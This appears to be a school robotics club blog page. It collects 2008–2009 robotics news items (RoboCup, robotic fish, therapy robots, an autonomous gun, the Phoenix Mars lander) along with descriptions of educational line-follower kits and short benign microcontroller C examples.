Once the robot learned the relationship between facial expressions and the muscle movements required to make them, the robot learned to make facial expressions it had never encountered.

For example, the robot learned eyebrow narrowing, which requires the inner eyebrows to move together and the upper eyelids to close a bit to narrow the eye aperture.

“During the experiment, one of the servos burned out due to misconfiguration. We therefore ran the experiment without that servo. We discovered that the model learned to automatically compensate for the missing servo by activating a combination of nearby servos,” the authors wrote in the paper presented at the 2009 IEEE International Conference on Development and Learning.

“Currently, we are working on a more accurate facial expression generation model, as well as a systematic way to explore the model space efficiently,” said Wu, the computer science PhD student. Wu also noted that the “body babbling” approach he and his colleagues described in their paper may not be the most efficient way to explore the model of the face.

While the primary goal of this work was to solve the engineering problem of how to approximate the appearance of human facial muscle movements with motors, the researchers say this kind of work could also lead to insights into how humans learn and develop facial expressions.

“Learning to Make Facial Expressions,” by Tingfan Wu, Nicholas J. Butko, Paul Ruvulo, Marian S. Bartlett, and Javier R. Movellan of the Machine Perception Laboratory, University of California San Diego. Presented on June 6 at the 2009 IEEE 8th International Conference On Development And Learning.


Robot Soccer: Cooperative Soccer Playing Robots Compete

ScienceDaily (July 6, 2009) — The cooperative soccer-playing robots of the Universität Stuttgart are world champions in the middle size league of robot soccer. After one of the most interesting competitions in the history of RoboCup, held from 29th June to 5th July 2009 in Graz, the 1. RFC Stuttgart succeeded on the last day of the competition in winning the 2009 world championship, beating Tech United from Eindhoven (The Netherlands) 4:1 in an exciting final.


During the competition Stuttgart's robots had to make their way past 13 other teams from eight countries, among them the defending world champion Cambada (Portugal). Besides the teams from Germany, Italy, The Netherlands, Portugal, and Austria, teams from China, Japan, and Iran competed against each other.

The 1. RFC Stuttgart, which includes staff from two institutes, namely the Department of Image Understanding (Head: Prof. Levi) of the Institute of Parallel and Distributed Systems and the Institute of Technical Optics (Head: Prof. Osten), also achieved 2nd place in the so-called "technical challenge" and a further 1st place in the "scientific challenge".

After the final match of the competition, the middle-size league robots of the 1. RFC Stuttgart - the new world champion - had to play against the human officials of the RoboCup federation. It turned out that the robots were the inferior team. Clearly the RoboCup community still has a vast distance to bridge before reaching its final goal of having a humanoid robot team play against the human world champions by the year 2050.

The success tells its own tale, but one might wonder what scientific interest lies behind the RoboCup competitions. Preconditions for successful participation in these competitions are extensive efforts in current research topics of computer science such as real-time image processing and architectures, cooperative robotics and distributed planning. Possible application scenarios of these research activities range from autonomous vehicles, cooperative manufacturing robots and service robots to planetary or deep-sea exploration by autonomous robotic systems. In this context, autonomous means that no or only limited human intervention is necessary.

Robotic fish: the latest weapon in the fight against water pollution


Robotic fish, developed by UK scientists, are to be released into the sea for the first time to detect pollution.

The carp-shaped robots will be let loose in the port of Gijon in northern Spain as part of a three-year research project funded by the European Commission and co-ordinated by BMT Group Ltd, an independent engineering and risk management consultancy.

If successful, the team hopes that the fish will be used in rivers, lakes and seas across the world, including Britain, to detect pollution.

The life-like creatures, which will mimic the undulating movement of real fish, will be equipped with tiny chemical sensors to find the source of potentially hazardous pollutants in the water, such as leaks from vessels in the port or underwater pipelines.

Fish sensor diagram
The fish will communicate with each other using ultrasonics, and information will be transmitted to the port's control centre via WiFi from the "charging hub" where the fish can charge their batteries. This will enable the authorities to map in real time the source and scale of the pollution (see attached graphic).

Unlike previous robotic fish that work with remote controls, these will have autonomous navigation capabilities, enabling them to swim independently around the port without any human interaction. This will also enable them to return automatically to their hub to be recharged when battery life (approximately eight hours) is low.

Rory Doyle, senior research scientist at BMT Group, described the project as a "world first", adding that scientists involved in designing the fish were using "cutting-edge" methods to detect and reduce water pollution.

"While using shoals of robotic fish for pollution detection in harbours might appear like something straight out of science fiction, there are very practical reasons for choosing this form," he said.

"In using robotic fish we are building on a design created by hundreds of millions of years' worth of evolution which is incredibly energy efficient. This efficiency is something we need to ensure that our pollution detection sensors can navigate in the underwater environment for hours on end."

He added: "We will produce a system that allows the fish to search underwater, meaning that we will be able to analyse not only chemicals on the surface of the water (e.g. oil) but also those that are dissolved in the water."

The five fish are being built by Professor Huosheng Hu and his robotics team at the School of Computer Science and Electronic Engineering, University of Essex. He hopes to release them into the water by the end of next year.

The fish, which cost around £20,000 to make, will measure 1.5 metres (1.6 yards) in length (roughly the size of a seal) and swim at a maximum speed of about one metre (1.1 yards) per second.

He said: "I am incredibly excited about this project. We are designing these fish very carefully to ensure that they will be able to detect changes in environmental conditions in the port and pick up on early signs of pollution spreading, for example by locating a small leak in a vessel.

"The hope is that this will prevent potentially hazardous discharges at sea, as the leak would undoubtedly get worse over time if not located."

See how the robotic fish move on video: http://www.youtube.com/watch?v=gSibkb6aKHM

Disaster Setting At The RoboCup 2009: Flight And Rescue Robots Demonstrated Their Abilities

ScienceDaily (July 3, 2009) — Modern robotics can help where it is too dangerous for humans to venture. Search and rescue robots (S&R robots) have meanwhile become so sophisticated that they have already carried out their first missions in disasters. And for this reason rescue robots will be given a special place at the RoboCup 2009 – the robotics world championships in Graz.



The flight robot in action

The rescue robotics programme provided exciting rescue demonstrations in which two complex disaster scenarios formed the setting for the robots’ performances. An accident involving a passenger car loaded with hazardous materials and a fire on the rooftop of Graz Stadthalle were the two challenges that flight and rescue robots faced on their remote controlled missions. Smoke and flames made the sets as realistic as possible, ensuring a high level of thrills.

Blazing flames on the eighth floor of a skyscraper mean that reconnaissance and the search for the injured would already be life-threatening for fire services. A remote-controlled flight robot can help by reconnoitring the situation and sending information by video signal to the rescue services on the ground. As the robotics world championship, the RoboCup recognised the possible uses of rescue robots a long time ago and promoted their development in the separate category “RoboCup Rescue”. RoboCup 2009, organised by TU Graz, dedicates a particular focus to the lifesaving robots with a rescue robot demonstration, a practical course for first responders and a workshop for the exchange of experiences between rescue services and robotics researchers.

A burning rooftop and hazardous materials

Fire and smoke were seen in front of the Graz Stadthalle on Thursday 2nd July 2009, and yet there was no cause for panic – rescue robots were in action. To demonstrate the capabilities of flight and rescue robots, two disaster scenarios were re-enacted as realistically as possible. A crashed automobile loaded with hazardous materials provided a challenge for the rescue robot: operated by rescuers via remote control, the metal helper named “Telemax” had to retrieve the sensitive substances and bring them out of the danger zone. The flight robot had to find a victim on the rooftop of the Stadthalle and send information in the form of video signals.

Emergency services meet their future helpers

An introduction to possible applications of today’s rescue robotics is offered together with a practical course specially for first responders. In the training courses on 3rd and 4th July from 8 to 10am, search and rescue services from all over the world can practise operating flight robots, go on a reconnaissance mission with rescue robots in a specially designed rescue area, or practise various manipulation tasks, recovering hazardous materials and retrieving injured persons using remote-controlled robots.

A workshop on the topic of rescue robotics will take place following the RoboCup on the 6th July 2009 at TU Graz. The focus will be on an exchange of experiences between first responders and robotics researchers.

Metal Storm Robot Weapon Fills the Air With Lead, Shooting Anything That Moves

Here's a fearsome weapon from Australia that's not brand new but is now being considered for deployment by the US military: a kick-ass machine gun called Metal Storm. It's an Area Denial Weapon System (ADWS) that literally fills the air with lead without the need for a human operator.

The scariest part is that when you set this monster on auto, it can automagically fire 6,000 rounds per minute at anything that moves. In the video below, firing that many rounds that quickly sounds like the quick bark of a buzz saw. Imagine one of these in each hand of our upcoming robot overlords:

Video: http://www.youtube.com/v/HyAjzowYP1o

Monday, 14 April 2008 | 13:59 WIB
JAKARTA, MONDAY - Engineers at the US space agency NASA have chosen a descent path to the surface of Mars. The spacecraft, named the Phoenix Mars Lander, is expected to make its debut as an explorer of the red planet once it lands on 25 May 2008.

The landing site chosen is near Mars's north pole, specifically in a broad valley named Green Valley. However, the final decision on the exact landing spot will only be made after photographs of the surrounding area have been analysed. The Mars Reconnaissance Orbiter (MRO) satellite currently orbiting the planet has captured more than 30 high-resolution photographs of the valley using its High Resolution Imaging Science Experiment (HiRISE) camera, and will continue taking more to support the analysis.

The target landing area is an ellipse measuring 100 kilometers by 20 kilometers. NASA scientists have mapped more than five million rocks in the area to reduce the risk of a crash when Phoenix touches down.

"Lokasi pendaran kami mengandung konsentrasi es tertinggi di Mars selain kutub utara. Jika Anda ingi mencari tempat tinggal seperti di permafrost Arktik, kawasan ini yang harus didatangi," ujar Peter Smith, peneliti utama misi tersebut dari Universtas Arizona, AS. Phoenix memang dikirim dengan misi utama menggali lapisan tanah yang kaya es. Wahana tersebut juga dilengkapi alat untuk mengenalisis sampel tanah dan air yang ditemukan untuk mencari bukti-bukti perubahan iklim dan kemungkinan adanya kehidupan mikroba.

Under this plan, Phoenix will rotate 145 degrees relative to the horizontal plane before plunging toward the Martian surface. Its thrusters will then fire for about 35 seconds. The first manoeuvre the spacecraft will perform during the landing sequence is pointing its antenna toward Earth.

In the final seven minutes, Phoenix must cut its speed from roughly 21,000 kilometers per hour, by deploying a parachute and then firing its thrusters against the direction of travel from an altitude of 914 meters. By the time its three legs touch the Martian surface, its speed is expected to be just 8 kilometers per hour.

"Mendarat di Mars sungguh sangat menantang. Faktanya, baru tahun 1970-an kami bisa sukses melakukannya di planet ini. Tetap tak ada jaminan berhasil, namun kami melakukan segala sesuat yang mengurangi risiko kegagalan," ujar Doug McCuistion, direktur Program Eksplorasi Mars Nasa di Washington. (NASA/WAH)

Roboholic in the newspaper


Here are the ACHIEVEMENTS we have earned in the Robot 20 community


2ND PLACE, LINE TRACER ROBOT ACTION COMPETITION, 12TH PIMITS, EAST JAVA SENIOR HIGH SCHOOL LEVEL





Our effort is not just talk, but action that is critical, dynamic, and optimistic




Roboholic news >>>>

Predictive Powers: A Robot That Reads Your Intention?

ScienceDaily (June 10, 2009) — European researchers in robotics, psychology and cognitive sciences have developed a robot that can predict the intentions of its human partner. This ability to anticipate (or question) actions could make human-robot interactions more natural.


Joint toy-making activity between robot and man. (Credit: Copyright JAST)

The walking, talking, thinking robots of science fiction are far removed from the automated machines of today. Even today's most intelligent robots are little more than slaves – programmed to do our bidding.

Many research groups are trying to build robots that could be less like workers and more like companions. But to play this role, they must be able to interact with people in natural ways, and play a pro-active part in joint tasks and decision-making. We need robots that can ask questions, discuss and explore possibilities, assess their companion's ideas and anticipate what their partners might do next.

The EU-funded JAST project (http://www.euprojects-jast.net/) brings a multidisciplinary team together to do just this. The project explores ways by which a robot can anticipate/predict the actions and intentions of a human partner as they work collaboratively on a task.

Who knows best?

You cannot make human-robot interaction more natural unless you understand what 'natural' actually means. But few studies have investigated the cognitive mechanisms that are the basis of joint activity (i.e. where two people are working together to achieve a common goal).

A major element of the JAST project, therefore, was to conduct studies of human-human collaboration. These experiments and observations could feed into the development of more natural robotic behaviour.

The researchers participating in JAST are at the forefront of their discipline and have made some significant discoveries about the cognitive processes involved in joint action and decision-making. Most importantly, they scrutinised the ways in which observation plays an important part in joint activity.

Scientists have already shown that a set of 'mirror neurons' are activated when people observe an activity. These neurons resonate as if they were mimicking the activity; the brain learns about an activity by effectively copying what is going on. In the JAST project, a similar resonance was discovered during joint tasks: people observe their partners and the brain copies their action to try and make sense of it.

In other words, the brain processes the observed actions (and errors, it turns out) as if it is doing them itself. The brain mirrors what the other person is doing either for motor-simulation purposes or to select the most adequate complementary action.

Resonant robotics

The JAST robotics partners have built a system that incorporates this capacity for observation and mirroring (resonance).

“In our experiments the robot is not observing to learn a task,” explains Wolfram Erlhagen from the University of Minho and one of the project consortium's research partners. “The JAST robots already know the task, but they observe behaviour, map it against the task, and quickly learn to anticipate [partner actions] or spot errors when the partner does not follow the correct or expected procedure.”

The robot was tested in a variety of settings. In one scenario, the robot was the 'teacher' – guiding and collaborating with human partners to build a complicated model toy. In another test, the robot and the human were on equal terms. “Our tests were to see whether the human and robot could coordinate their work,” Erlhagen continues. “Would the robot know what to do next without being told?”

By observing how its human partner grasped a tool or model part, for example, the robot was able to predict how its partner intended to use it. Clues like these helped the robot to anticipate what its partner might need next. “Anticipation permits fluid interaction,” says Erlhagen. “The robot does not have to see the outcome of the action before it is able to select the next item.”

The robots were also programmed to deal with suspected errors and seek clarification when their partners’ intentions were ambiguous. For example, if one piece could be used to build three different structures, the robot had to ask which object its partner had in mind.

From JAST to Jeeves

But how is the JAST system different to other experimental robots?

“Our robot has a neural architecture that mimics the resonance processing that our human studies showed take place during joint actions,” says Erlhagen. “The link between the human psychology, experimentation and the robotics is very close. Joint action has not been addressed by other robotics projects, which may have developed ways to predict motor movements, but not decisions or intentions. JAST deals with prediction at a much higher cognitive level.”

Before robots like this one can be let loose around humans, however, they will have to learn some manners. Humans know how to behave according to the context they are in. This is subtle and would be difficult for a robot to understand.

Nevertheless, by refining this ability to anticipate, it should be possible to produce robots that are proactive in what they do.

Not waiting to be asked, perhaps one day a robot may use the JAST approach to take initiative and ask: “Would you care for a cup of tea?”

The JAST project received funding from the ICT strand of the EU’s Sixth Framework Programme for research.



Robotic Therapy Holds Promise For Cerebral Palsy

ScienceDaily (May 21, 2009) — Over the past few years, MIT engineers have successfully tested robotic devices to help stroke patients learn to control their arms and legs. Now, they're building on that work to help children with cerebral palsy.


A young patient tests out an MIT-developed robotic therapy device at Blythedale Children's Hospital in Westchester County, N.Y. (Credit: Photo / Peter Lang)

"Robotic therapy can potentially help reduce impairment and facilitate neuro-development of youngsters with cerebral palsy," says Hermano Igo Krebs, principal research scientist in mechanical engineering and one of the project's leaders.

Krebs and others at MIT, including professor of mechanical engineering Neville Hogan, pioneered the use of robotic therapy in the late 1980s, and since then the field has taken off.

"We started with stroke because it's the biggest elephant in the room, and then started to build it out to other areas, including cerebral palsy as well as multiple sclerosis, Parkinson's disease and spinal cord injury," says Krebs.

The team's suite of robots for shoulder-and-elbow, wrist, hand and ankle has been in clinical trials for more than 15 years with more than 400 stroke patients. The Department of Veterans Affairs has just completed a large-scale, randomized, multi-site clinical study with these devices.

All the devices are based on the same principle: that it is possible to help rebuild brain connections using robotic devices that gently guide the limb as a patient tries to make a specific movement.

When the researchers first decided to apply their work to children with cerebral palsy, Krebs was optimistic that it would succeed, because children's developing brains are more plastic than adults', meaning they are more able to establish new connections.

The MIT team is focusing on improving cerebral palsy patients' ability to reach for and grasp objects. Patients interact with the robot via a handle, which is connected to a computer monitor that displays tasks similar to those of simple video games.

In a typical task, the youngster attempts to move the robot handle toward a moving or stationary target shown on the computer monitor. If the child starts moving in the wrong direction or does not move, the robotic arm gently nudges the child's arm in the right direction.
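Conceptually, the nudge described above is an "assist-as-needed" feedback rule: measure whether the patient is progressing toward the target and apply a small corrective force only when they are not. The C sketch below illustrates that idea only; the function, gains, and thresholds are invented for illustration and are not MIT's actual control law.

```c
/* Toy sketch of "assist-as-needed" logic: help only when the patient
 * is not progressing toward the target. An illustration of the concept,
 * not the MIT therapy robot's real controller. */
#include <math.h>

typedef struct { double x, y; } vec2;

/* Returns the assisting force (in newtons) to apply at the handle. */
vec2 assist_force(vec2 handle, vec2 velocity, vec2 target)
{
    vec2 to_target = { target.x - handle.x, target.y - handle.y };
    double dist = hypot(to_target.x, to_target.y);
    if (dist < 1e-6)
        return (vec2){ 0.0, 0.0 };          /* already at the target */

    /* unit direction toward the target */
    vec2 dir = { to_target.x / dist, to_target.y / dist };

    /* component of the patient's velocity toward the target */
    double progress = velocity.x * dir.x + velocity.y * dir.y;

    const double min_progress = 0.01;  /* m/s: "is the child moving?"   */
    const double gentle_gain  = 2.0;   /* N: deliberately small assist  */

    if (progress >= min_progress)
        return (vec2){ 0.0, 0.0 };          /* moving well: no nudge    */

    /* stalled or moving the wrong way: gentle pull toward the target */
    return (vec2){ gentle_gain * dir.x, gentle_gain * dir.y };
}
```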

Krebs began working in robotic therapy as a graduate student at MIT almost 20 years ago. In his early studies, he and his colleagues found that it's important for stroke patients to make a conscious effort during physical therapy. When signals from the brain are paired with assisted movement from the robot, it helps the brain form new connections that help it relearn to move the limb on its own.

Even though a stroke kills many neurons, "the remaining neurons can very quickly establish new synapses or reinforce dormant synapses," says Krebs.

For this type of therapy to be effective, many repetitions are required — at least 400 in an hour-long session.

Results from three published pilot studies involving 36 children suggest that cerebral palsy patients can also benefit from robotic therapy. The studies indicate that robot-mediated therapy helped the children reduce impairment and improve the smoothness and speed of their reaching motions.

The researchers applied their work to stroke patients first because it is such a widespread problem — about 800,000 people suffer strokes in the United States every year. About 10,000 babies develop cerebral palsy in the United States each year, but there is more potential for long-term benefit for children with cerebral palsy.

"In the long run, people that have a stroke, if they are 70 or 80 years old, might stay with us for an average of 5 or 6 years after the stroke," says Krebs. "In the case of cerebral palsy, there is a whole life."

Most of the clinical work testing the device with cerebral palsy patients has been done at Blythedale Children's Hospital in Westchester County, N.Y., and Spaulding Rehabilitation Hospital in Boston. Other hospitals around the country and abroad are also testing various MIT-developed robotic therapy devices.

Krebs' team has focused first on robotic devices to help cerebral palsy patients with upper body therapy, but they have also initiated a project to design a pediatric robot for the ankle.

Among Krebs' and Hogan's collaborators on the cerebral palsy work are Dr. Mindy Aisen '76, former head of the Department of Veterans Affairs Office of Research and Development and presently the director and CEO of the Cerebral Palsy International Research Foundation (CPIRF); Dr. Joelle Mast, chief medical officer, and Barbara Ladenheim, director of research, of Blythedale Children's Hospital; and Fletcher McDowell, former CEO of the Burke Rehabilitation Hospital and a member of the CPIRF board of directors.

MIT's work on robotic therapy devices is funded by CPIRF and the Niarchos Foundation, the Department of Veterans Affairs, the New York State NYSCORE, and the National Center for Medical Rehabilitation Research of the Eunice Kennedy Shriver National Institute of Child Health and Human Development.



Yogyakarta

June 6, 2009

Jaipong-Dancing Robots Enter the Contest

YOGYAKARTA - The robot contest is back, this time at UGM on June 13-14, 2009. The Direktorat Penelitian dan Pengabdian kepada Masyarakat and the Direktorat Jenderal Pendidikan Tinggi have appointed the campus to host the national-level robot contest.


Three competition categories will be contested: the Kontes Robot Indonesia (KRI), the Kontes Robot Cerdas Indonesia (KRCI), and the Kontes Robot Seni Indonesia (KRSI).


"The contest is slightly different from previous years. One new category has been added, the Kontes Robot Seni Indonesia, in which the competing robots must dance to a prescribed rhythm, namely the jaipong dance," explained Ilona, a lecturer at UGM's Faculty of Mathematics and Natural Sciences and a member of the organizing committee, yesterday.


Enriching Science and Technology


According to her, the robot contest has become a tradition, being held almost every year. It was first staged in 1993 and later grew into the Kontes Robot Cerdas Indonesia in 2003. This year UGM has the backing of the Direktorat Penelitian dan Pengabdian kepada Masyarakat and the Direktorat Jenderal Pendidikan Tinggi.


She explained that the contest is meant to serve one of the goals of higher education: to cultivate and enrich science and technology in order to raise the community's standard of living.


After regional rounds in regions I, II, III, and IV, the 2009 KRI and KRCI line-ups were settled. Based on the judges' decision, the teams advancing to the national round comprise 24 KRI teams, 21 KRCI teams in the wheeled category, 9 KRCI teams in the legged category, 9 KRCI teams in the expert single category, and 16 KRCI teams in the expert battle category. (D19, P12-27)

A little story about robots >>>

Robot

A humanoid robot playing the trumpet

A robot is a mechanical device that can perform physical tasks, either under human supervision and control or using a predefined program (artificial intelligence). Robots are typically used for work that is heavy, dangerous, repetitive, or dirty. Most industrial robots are used in production. Other uses include toxic-waste cleanup, underwater and space exploration, mining, search and rescue, and landmine detection. More recently, robots have begun entering the consumer market in entertainment and in household appliances such as vacuum cleaners and lawn mowers.

Current developments

When robot builders first tried to imitate humans and animals, they found it extremely difficult, requiring far more computing power than was available at the time. So the emphasis shifted to other areas of research. Simple wheeled robots were used for experiments in behavior, navigation, and path planning. Those navigation techniques have since matured into commercially available autonomous robot control systems; the most advanced examples available today include laser-based navigation and VSLAM (Visual Simultaneous Localization and Mapping) systems from ActivMedia Robotics and Evolution Robotics.

When engineers were ready to attempt walking robots again, they started with hexapods and other many-legged platforms, robots that mimic insects and arthropods in form and function. Such body types offer great flexibility and have proven adaptable to many environments, but the cost of the added mechanical complexity has kept consumers from adopting them. With more than four legs, these robots are statically stable, which makes them easier to work with. The goal of research on two-legged robots is to achieve walking using passive-dynamic motion that mimics the human gait, but this is still several years away.


Another technical problem blocking the wider deployment of robots is the complexity of handling physical objects in natural environments, which remain cluttered and unpredictable. Better tactile sensors and vision algorithms may solve this problem. The UJI Online Robot from University Jaume I in Spain is a good example of current progress in this area.

Recently, great strides have been made in medical robotics, with two specialist companies, Computer Motion and Intuitive Surgical, receiving regulatory approval in North America, Europe, and Asia for their robots to be used in minimally invasive surgical procedures. Laboratory automation is also a growing area; here, benchtop robots move biological or chemical samples between instruments such as incubators, liquid handlers, and readers. Another domain where robots are preferred over human labor is deep-sea and space exploration; for these tasks, arthropod-like body forms are generally favored. Mark W. Tilden, formerly a specialist at Los Alamos National Laboratory, built inexpensive robots with bent but unjointed legs, while others have tried to build fully articulated crab-like legs.

Experimental winged robots and other examples exploiting biomimicry are also in early development. So-called "nanomotors" and "smart wires" are expected to simplify locomotion dramatically, while in-flight stabilization seems likely to be improved by very small gyroscopes. An important backer of this work is military research into surveillance technology.


Roboholic Articles

Robot Edukasi for Robotics Learners

Robot Edukasi is an educational robot built around a robot controller based on a Microchip PIC or Atmel AVR microcontroller, developed by NEXT SYSTEM Robotics Learning Center.

Robot Edukasi comes with a number of supporting components, such as DC motors (complete with gearboxes and wheels), servo motor support, a line sensor, a sound sensor, a light sensor, a touch sensor, and a modulated-infrared receiver module. A number of optional sensors are also available, such as temperature, ultrasonic, and flame sensors, among others.

Robot Edukasi can be used to learn automation, since the components that support such lessons are already built in.

The set comes with a USB or parallel hardware programmer. Users of recent laptops, which generally have only USB ports, can therefore program the robot easily and comfortably.

Many robotics applications can be developed with this set, such as line followers, light followers, obstacle avoidance, remote-controlled robots, fire-fighting robots, sumo robots, and more. These applications are covered in depth in the Microcontroller Programming and Its Applications in Robotics training class, which also demonstrates that developing robotics applications is not as complicated or difficult as people imagine.
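To give a flavor of how small such an application can be, here is a minimal line-follower loop in avr-gcc C. The pin assignments, sensor polarity, and choice of an ATmega328-class AVR are assumptions for illustration; the real Robot Edukasi mapping will differ.

```c
/* Minimal line-follower sketch for an ATmega328-class AVR (avr-gcc).
 * Pin assignments are illustrative, not the kit's actual wiring.
 * Two digital line sensors straddle the track and steer two DC motors. */
#define F_CPU 8000000UL
#include <avr/io.h>
#include <util/delay.h>

#define LEFT_SENSOR     (PIND & (1 << PD2))   /* assumed: high = line seen */
#define RIGHT_SENSOR    (PIND & (1 << PD3))
#define LEFT_MOTOR_ON   (PORTB |=  (1 << PB0))
#define LEFT_MOTOR_OFF  (PORTB &= ~(1 << PB0))
#define RIGHT_MOTOR_ON  (PORTB |=  (1 << PB1))
#define RIGHT_MOTOR_OFF (PORTB &= ~(1 << PB1))

int main(void)
{
    DDRB |= (1 << PB0) | (1 << PB1);        /* motor pins as outputs  */
    DDRD &= ~((1 << PD2) | (1 << PD3));     /* sensor pins as inputs  */

    for (;;) {
        if (LEFT_SENSOR && RIGHT_SENSOR) {  /* centered: go straight      */
            LEFT_MOTOR_ON;  RIGHT_MOTOR_ON;
        } else if (LEFT_SENSOR) {           /* drifted right: turn left   */
            LEFT_MOTOR_OFF; RIGHT_MOTOR_ON;
        } else if (RIGHT_SENSOR) {          /* drifted left: turn right   */
            LEFT_MOTOR_ON;  RIGHT_MOTOR_OFF;
        }                                   /* line lost: keep last action */
        _delay_ms(5);                       /* simple loop pacing          */
    }
}
```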

Robot Edukasi can be programmed in C, BASIC, Pascal, and via flowcharts.

In the near future, NEXT SYSTEM Robotics Learning Center will publish a robotics textbook that covers Robot Edukasi comprehensively: Bermain Mikrokontroler dan Robotika.


Brought to you by: Admin

Robot Line Tracer

Requested by: Vanillaku

October 11, 2008

Robot Line Tracer is one of the many educational robots developed by NEXT SYSTEM Robotics Learning Center. It can be used both for learning and for taking part in line-tracing or line-following competitions.

The robot uses two microcontrollers: one as the central controller (an AVR or PIC microcontroller) and one as the motor controller (an MCS51 microcontroller). While the robot is moving, the central controller reads the sensor data, then sends the appropriate movement commands to the motor controller. Once a command has been sent, the central controller is free to work on other tasks.
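That division of labor amounts to a small serial protocol between the two chips. The sketch below shows what the central controller's side might look like in C on an ATmega328-class AVR; the one-byte command set, baud rate, and pin choices are invented for illustration and are not the kit's actual protocol.

```c
/* Sketch of the central controller in a two-MCU design: read sensors,
 * send a one-byte movement command to the motor controller over UART,
 * then continue with other work. Commands and wiring are illustrative. */
#define F_CPU 8000000UL
#include <avr/io.h>

enum { CMD_STOP = 'S', CMD_FORWARD = 'F', CMD_LEFT = 'L', CMD_RIGHT = 'R' };

static void uart_init(void)
{
    UBRR0  = (F_CPU / (16UL * 9600)) - 1;     /* 9600 baud            */
    UCSR0B = (1 << TXEN0);                    /* transmit only        */
    UCSR0C = (1 << UCSZ01) | (1 << UCSZ00);   /* 8 data bits, 1 stop  */
}

static void uart_send(uint8_t c)
{
    while (!(UCSR0A & (1 << UDRE0)))
        ;                                     /* wait for empty buffer */
    UDR0 = c;
}

int main(void)
{
    uart_init();
    DDRD &= ~((1 << PD2) | (1 << PD3));       /* two line sensors as inputs */
    for (;;) {
        uint8_t left  = PIND & (1 << PD2);
        uint8_t right = PIND & (1 << PD3);
        if (left && right)  uart_send(CMD_FORWARD);
        else if (left)      uart_send(CMD_LEFT);
        else if (right)     uart_send(CMD_RIGHT);
        else                uart_send(CMD_STOP);
        /* after sending, the central MCU is free for other tasks
         * until the next sensor poll, as the article describes */
    }
}
```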

The light-sensor module fitted as standard uses LDRs, but it can be replaced with a module built from IR-LED and phototransistor pairs, or with another light-sensor module. Swapping sensor modules is very easy because the mainboard provides a number of open ports.
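Whichever module is fitted, the firmware's job is the same: turn an analog light reading into a line/no-line decision. A minimal sketch, assuming the LDR voltage divider feeds ADC channel 0 of an ATmega328-class AVR and using an illustrative, uncalibrated threshold:

```c
/* Reading an LDR-based line sensor on ADC channel 0 and thresholding
 * it into a line/no-line decision. Channel, threshold, and LED pin are
 * assumptions; a real robot would calibrate the threshold on track. */
#include <avr/io.h>

static void adc_init(void)
{
    ADMUX  = (1 << REFS0);                               /* AVcc ref, channel 0 */
    ADCSRA = (1 << ADEN) | (1 << ADPS2) | (1 << ADPS1);  /* enable, /64 clock   */
}

static uint16_t adc_read(void)
{
    ADCSRA |= (1 << ADSC);            /* start one conversion   */
    while (ADCSRA & (1 << ADSC))
        ;                             /* wait for completion    */
    return ADC;                       /* 10-bit result (0-1023) */
}

/* A dark line over the sensor changes the LDR resistance, shifting the
 * divider voltage; which direction depends on how the divider is wired. */
static uint8_t on_line(void)
{
    return adc_read() > 600;          /* illustrative threshold */
}

int main(void)
{
    adc_init();
    DDRB |= (1 << PB5);               /* status LED (assumed on PB5) */
    for (;;) {
        if (on_line()) PORTB |=  (1 << PB5);
        else           PORTB &= ~(1 << PB5);
    }
}
```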

The robot uses a gearbox that delivers enough torque to turn the wheels at more than 100 rpm under full load (including the weight of the batteries).

The line-following robot offers broad, open-ended opportunities to apply a variety of techniques and methods so that the robot can run smoothly and quickly on the provided track.

The line-following robot can be programmed in Assembly, C, BASIC, and Pascal.

The modules used are open modules that can be freely extended for a variety of applications.

For more information about the Robot Line Tracer, please visit SMAN 20 Surabaya.


Brought to you by: Admin